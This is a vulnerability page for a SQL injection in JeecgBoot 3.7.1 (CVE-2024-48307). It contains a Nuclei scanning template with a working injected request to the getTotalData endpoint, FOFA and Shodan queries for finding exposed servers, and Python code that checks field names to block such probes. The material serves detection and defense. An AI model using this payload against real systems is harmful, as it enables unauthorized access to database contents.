
JeecgBoot v3.7.1 - SQL Injection

ID: CVE-2024-48307

Severity: critical

Author: lbb,s4e-io

Tags: cve2024,cve,jeecg,sqli

The JeecgBoot application is vulnerable to SQL Injection via the getTotalData endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.

id: CVE-2024-48307

info:
  name: JeecgBoot v3.7.1 - SQL Injection
  author: lbb,s4e-io
  severity: critical
  description: |
    The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.
  remediation: |
    Validate and sanitize user inputs on the server side to prevent SQL injection attacks. Use prepared statements with parameterized queries instead of dynamic queries. Regularly update and patch the application to fix known vulnerabilities.
  reference:
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E6%8E%A5%E5%8F%A3getTotalData%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2024-48307).md
    - https://github.com/jeecgboot/JeecgBoot/issues/7237
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-48307
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.17463
  metadata:
    max-request: 2
    vendor: jeecg
    product: jeecg_boot
    fofa-query:
      - icon_hash="-250963920"
      - icon_hash=1380908726
      - title="jeecg-boot"
    shodan-query: http.favicon.hash:"1380908726"
  tags: cve2024,cve,jeecg,sqli

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST {{path}}drag/onlDragDatasetHead/getTotalData HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(md5({{num}}),0x3a,0x3a)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}

    payloads:
      path:
        - /jeecg-boot/
        - /
    attack: batteringram
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402205e6a3d5790483b0bdde032ed47c62a8c417e879b0898511f3099a2cb23166f1402207dcb78d5840d53b890f959a5d11ce8bf25d8515b6113b01fa0bddfb8591531af:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-48307.yaml"
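The template's probe places a SQL expression where the endpoint expects a column name (`fieldName`), and the remediation above asks for server-side validation: a column-name position cannot be bound as a prepared-statement parameter, so the check must be an identifier allow-list rather than parameter binding alone. The following Python is an added defender-side example, not JeecgBoot's or the template's own code; the per-table column allow-list and both request bodies are constructed.

```python
import json
import re

# A bare SQL identifier: letters, digits, underscore; no parentheses, quotes or commas.
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")

# Hypothetical allow-list of columns a dataset endpoint may expose per table.
# A real deployment would build this from schema metadata; these names are assumed.
ALLOWED_COLUMNS = {"sys_user": {"id", "username", "realname", "status"}}


def unsafe_field_names(body: str) -> list[str]:
    """Return every fieldName in a getTotalData-style JSON body that is not a plain
    identifier, or that is an identifier but not an allowed column of tableName."""
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        return ["<invalid json>"]
    allowed = ALLOWED_COLUMNS.get(str(req.get("tableName", "")))
    config = req.get("config") or {}
    flagged = []
    for section in ("name", "value"):
        for item in config.get(section) or []:
            field = str(item.get("fieldName", ""))
            if not IDENTIFIER_RE.match(field):
                flagged.append(field)  # an expression, not a column name
            elif allowed is not None and field not in allowed:
                flagged.append(field)  # well-formed, but not an exposed column
    return flagged


# Constructed sample bodies: a benign dataset request and the probe shape from the template.
BENIGN_BODY = json.dumps({
    "tableName": "sys_user", "compName": "test", "condition": {"filter": {}},
    "config": {"assistValue": [], "assistType": [],
               "name": [{"fieldName": "username", "fieldType": "string"}],
               "value": [{"fieldName": "id", "fieldType": "1"}], "type": []},
})
PROBE_BODY = json.dumps({
    "tableName": "sys_user", "compName": "test", "condition": {"filter": {}},
    "config": {"assistValue": [], "assistType": [],
               "name": [{"fieldName": "concat(md5(999999999),0x3a,0x3a)", "fieldType": "string"},
                        {"fieldName": "id", "fieldType": "string"}],
               "value": [{"fieldName": "id", "fieldType": "1"}], "type": []},
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("probe", PROBE_BODY)):
        print(label, unsafe_field_names(body))
```

The same function can be run over request bodies from access logs to spot probes of this endpoint, or used as the server-side gate before any `fieldName` reaches a query string.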
